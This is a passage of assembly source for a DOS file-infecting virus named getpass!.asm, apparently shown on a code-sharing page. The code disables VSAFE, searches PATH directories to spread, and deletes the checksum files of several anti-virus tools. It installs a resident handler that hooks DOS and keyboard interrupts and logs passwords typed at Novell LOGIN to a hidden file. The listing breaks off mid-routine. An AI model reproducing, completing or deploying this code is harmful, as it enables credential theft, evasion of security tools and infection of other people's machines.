📄 getpass!.asm
字号:
MOV WORD PTR[BP+OLDINT],BX ;Save it.
MOV WORD PTR[BP+OLDINT+2],ES;
MOV AH,25h ;Set new int 24 handler.
LEA DX,[BP+OFFSET NEWINT] ;DS:DX->new handler.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RINT24: PUSH DS ;Save data segment.
MOV AX,2524h ;Restore int 24 handler
LDS DX,[BP+OFFSET OLDINT] ;to original.
INT 21h ;Call DOS.
POP DS ;Restore data segment.
RET ;Return to caller.
;-----------------------------------------------------------------------------
VSAFE: MOV AX,3516h ;Get interrupt vector INT 16.
INT 21h ;(Now we know in wich segment it is.)
MOV WORD PTR[BP+OFFSET NINT16],BX; - Store old INT 16 in TSR.
MOV WORD PTR[BP+OFFSET NINT16+2],ES;/
ADD BX,0364h ;Here we find a jump that w'ill change.
CMP WORD PTR[ES:BX],0945h ;Is it THE jump?
JNE OK_9 ;No, already modified or not resident.
MOV WORD PTR[ES:BX],086Dh ;Yes, modify it.
OK_9: RET ;Return to caller. No Vsafe.
;-----------------------------------------------------------------------------
FIND1: MOV BYTE PTR[BP+OFFSET VAL_2],0FFh; This routine is derivied from
MOV BX,01h ; the VIENNA virus.
FIND2: PUSH ES ;- Save registers.
PUSH DS ;/
MOV ES,DS:2CH ;
MOV DI,0 ;ES:DI points to environment.
FPATH: LEA SI,[BP+OFFSET PATH] ;Point to "PATH=" string in data area.
LODSB ;
MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long.
REPNZ SCASB ;Search for first character.
MOV CX,4 ;Check if path
LOOP_2: LODSB ;is complete.
SCASB ;
JNZ FPATH ;If not all there, abort & start over.
LOOP LOOP_2 ;Loop to check the next character.
XCHG SI,DI ;Exchange registers.
MOV CL,BYTE PTR[BP+OFFSET VAL_2];Random value in CL.
PUSH ES ;\
POP DS ;-) Get DS, ES on address.
POP ES ;/
OK_14: LEA DI,[BP+OFFSET NEW_DTA+50];Offset address path.
OK_10: MOVSB ;Get name in path.
MOV AL,[SI] ;
CMP AL,0 ;Is it at the end?
JE OK_11 ;Yes, replicate.
CMP AL,3Bh ;Is it ';'?
JNE OK_10 ;Nope, next letter.
INC SI ;For next loop. ';'=';'+1.
INC BX ;
LOOP OK_14 ;Loop until random value = 0.
OK_11: POP DS ;Restore data segment.
MOV AL,0 ;Place space after the directory.
MOV [DI],AL ;
RET ;Return to caller.
;-----------------------------------------------------------------------------
DELSTUF:MOV BX,01h ;Set counter
PUSH BX ;and push it.
LEA DX,[BP+OFFSET MICRO] ;Is there a CHKLIST.MS file?
JMP INTER ;Check it out.
SECOND: LEA DX,[BP+OFFSET TBAV] ;Is there a ANTI-VIR.DAT file?
INC BX ;Increase counter
PUSH BX ;and push it.
JMP INTER ;Check it out.
THIRD: LEA DX,[BP+OFFSET CENTRAL] ;Is there a CHKLIST.CPS file?
INC BX ;Increase counter
PUSH BX ;and push it
INTER: MOV AH,4Eh ;Find first matching entry.
MOV CX,110b ;Search all attributes.
INT 21h ;Call DOS.
JC NODEL ;No match, find next.
CALL ATTRIB ;Clear attributes.
MOV AH,41h ;Delete file.
INT 21h ;Call DOS.
NODEL: POP BX ;Pop counter.
CMP BX,01 ;Had the first one?
JE SECOND ;Yes, do the second.
CMP BX,02 ;Was it the second?
JE THIRD ;Yes, do the third.
RET ;Finished, return to caller.
;-----------------------------------------------------------------------------
CHDRIVE:MOV CX,0FFFFh ;Clear CX.
MOV BL,'A'-1 ;AH=40
OK_15: INC BL ;AH=41='A'
INC CX ;CX=1
CMP BL,BYTE PTR[BP+OFFSET NEW_DTA+50];New drive letter.
JNE OK_15 ;Not the same, go again.
MOV DL,CL ;Calculated the new drive code.
MOV AH,0Eh ;Give up new drive code.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RTIME: MOV AX,5701h ;Restore time & date.
MOV CX,WORD PTR[BP+OFFSET TIME];Old time.
MOV DX,WORD PTR[BP+OFFSET DATE];Old date.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
STIME: MOV AX,5700h ;Get file date & time.
MOV BX,[BP+OFFSET HANDLE] ;File Handle.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET TIME],CX;Store time.
MOV WORD PTR[BP+OFFSET DATE],DX;Store date.
RET ;Return to caller.
;-----------------------------------------------------------------------------
BPOINT: XOR DX,DX ;Zero register.
MOV AX,4202h ;Move file pointer to top.
XOR CX,CX ;Zero register.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
ACTIVE: PUSH DS ;Save register.
INT 17h ;Check for NETX.
CMP AH,01h ;NETX resident?
JNE RESID ;Nope, do not install TSR.
CALL CREATE ;If not exsists, create password file.
CALL TIMER ;Time to print the password file?
MOV AX,3D3Dh ;Do resident check.
INT 21h ;Call BIOS.
CMP AX,1111h ;Already resident?
JE RESID ;If so, exit.
MOV AX,0044h ;Move code into hole in system
MOV ES,AX ;memory.
MOV DI,0100h ;ES:BX = 0044:0100
LEA SI,[BP+OFFSET TSR] ;Begin here
MOV CX,TSRLEN ;and this many bytes.
REP MOVSB ;Do it.
MOV DS,CX ;Get original INT 21 vector
MOV SI,0084h ;DS:SI = 0000:0084
MOV DI,0100h+NINTOF ;Store it in TSR
MOVSW ;One word,
MOVSW ;and another.
PUSH ES ;Restore register.
POP DS ;Restore register
MOV AX,2521h ;Give up new INT 21 vector.
MOV DX,0100h+INTOF ;Offset new INT 21.
INT 21h ;Call DOS.
MOV AX,2516h ;Give up new INT 16 vector.
MOV DX,0100h+INT16L ;Offset new INT 16.
INT 21h ;Call DOS.
RESID: POP DS ;- Restore register.
RET ;Return to caller.
;-----------------------------------------------------------------------------
TSR: DB 0 ; This is THE cool part!
;-----------------------------------------------------------------------------
INT21: CMP AX,4B00h ;Execute?
JE OK_16 ;Yep, do IT !
CMP AX,3D3Dh ;Resident check?
JNE DO_OLDI ;Nope, do original INT 21.
MOV AX,1111h ;Give up resident FLAG.
IRET ;Return to viral code.
DO_OLDI:JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21.
OK_16: PUSH BX ;\
PUSH CX ; \
PUSH DX ; ) Save registers.
PUSH DS ; /
PUSH ES ;/
MOV SI,0 ;
MOV BX,DX ;Name pointer into BX.
HERE: CMP BYTE PTR[BX],'.' ;Is it a point?
JE FOLLOW ;Yes, collected the name, cont.
INC BX ;BX+1
JMP HERE ;Get next character.
FOLLOW: SUB BX,05h ;Because LOGIN is 5 characters.
THERE: MOV AL,BYTE PTR [CS:0100+LOGINL+SI];Char into AL.
CMP BYTE PTR[BX+SI],'.' ;Did we make it until the point?
JE GETPASS ;It is LOGIN, get the password!
XOR AL,DS:[BX+SI] ;(XOR LOGIN,LOGIN)
JZ FOLLOW1 ;If XOR = 0 we have an equal char.
JMP ISNOT ;If not, well execute and do nothing.
FOLLOW1:INC SI ;Next char.
JMP THERE ;And compare again. (we must be shure.)
ISNOT: JMP ENDPARS ;Return to caller.
LOGIN DB 'LOGIN',0 ;Used to compare.
KBFLAG DB 0 ;Keyboard interrupt activation flag.
FNAME DB 'C:\DOS\MSD.INI',0 ;Password file specification.
KEYPTR DW 0 ;Keyboard pointer.
CCOUNT DB 0 ;\
CRETURN DB 0 ;/ Carriage return counter.
;-----------------------------------------------------------------------------
GETPASS:MOV BYTE PTR[CS:0100+KFLAG],0FFh;Set interrupt 16 flag.
POP ES ;\
POP DS ; \
POP DX ; ) Restore registers.
POP CX ; /
POP BX ;/
PUSH BX ;\
PUSH CX ; \
PUSH DX ; ) Save registers.
PUSH DS ; /
PUSH ES ;/
MOV DS,ES:[BX+04] ;\ Get param.pointer ES:SI
MOV SI,ES:[BX+02] ;/
PUSH CS ; \
POP ES ; ) Get keybuff pointer DS:DI
MOV DI,OFFSET[CS:0100+KBUFF]; /
XOR CX,CX ;
MOV CL,BYTE PTR DS:[SI] ;CX IS PARAM.LEN.
INC SI ;
INC SI ;
CMP CL,10h ;
JG ENDPARS ;
CMP CL,00h ;No parameters.
JE BRANCH ;
MOV BYTE PTR[CS:0100+COUCR],01h;
ENDFD: INC CX ;
MOV WORD PTR[CS:0100+KPTR],CX;Set keyb.index op len param.
DEC CX ;
REPNZ MOVSB ;
MOV BYTE PTR ES:[DI-1],CR ;
MOV BYTE PTR ES:[DI],LF ;
JMP ENDPARS ;
BRANCH: MOV BYTE PTR[CS:0100+COUCR],02h;
ENDPARS:POP ES ;\
POP DS ; \
POP DX ; ) Restore registers.
POP CX ; /
POP BX ;/
MOV AX,4B00h ;
JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21.
PARAM DB 0 ;
;-----------------------------------------------------------------------------
INT16: CMP BYTE PTR[CS:0100+KFLAG],0FFh;Is it login.?
JE NEXTCHK ; Yes! Get the password!
THE_END:JMP DWORD PTR[CS:0100+OLD16L];Nope, do old INT 16.
NEXTCHK:CMP AH,00h ; Keyboard funtion call?
JE TAKCHAR ; Yes, continue.
CMP AH,10h ; Keyboard function call?
JNE THE_END ;
TAKCHAR:PUSHF ;Push flag register.
CALL DWORD PTR[CS:0100+OLD16L];Call old INT 16.
PUSH DS ;\
PUSH CS ; \
POP DS ; \
PUSH AX ; ) Save regs and set DS
PUSH BX ; /
PUSH CX ; /
PUSH DX ;/
CMP AL,00H ; No key typed
JE RESREGS ;
MOV BX,WORD PTR[CS:0100+KPTR]; Keybuf index
CMP BX,001Bh ; Max. length of kbuff.
JGE RESREGS ; End int16
CMP AL,CR ; If key = <Return>
JE COUNTCR ;
BACK: MOV BYTE PTR[CS:0100+KBUFF+BX],AL; Copy char into KBuffer
INC BX ;
MOV WORD PTR[CS:0100+KPTR],BX;
RESREGS:POP DX ;\
POP CX ; \
POP BX ; ) Restore regs.
POP AX ; /
POP DS ;/
IRET ; Return
COUNTCR:MOV AL,LF ;Line feed into AL.
DEC BYTE PTR[CS:0100+COUCR] ;Decrease CR counter.
CMP BYTE PTR[CS:0100+COUCR],00h;Is it zero?
JE OVER_2 ;Nope, continue logging.
MOV BYTE PTR[CS:0100+KBUFF+BX],CR; Copy char into KBuffer
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -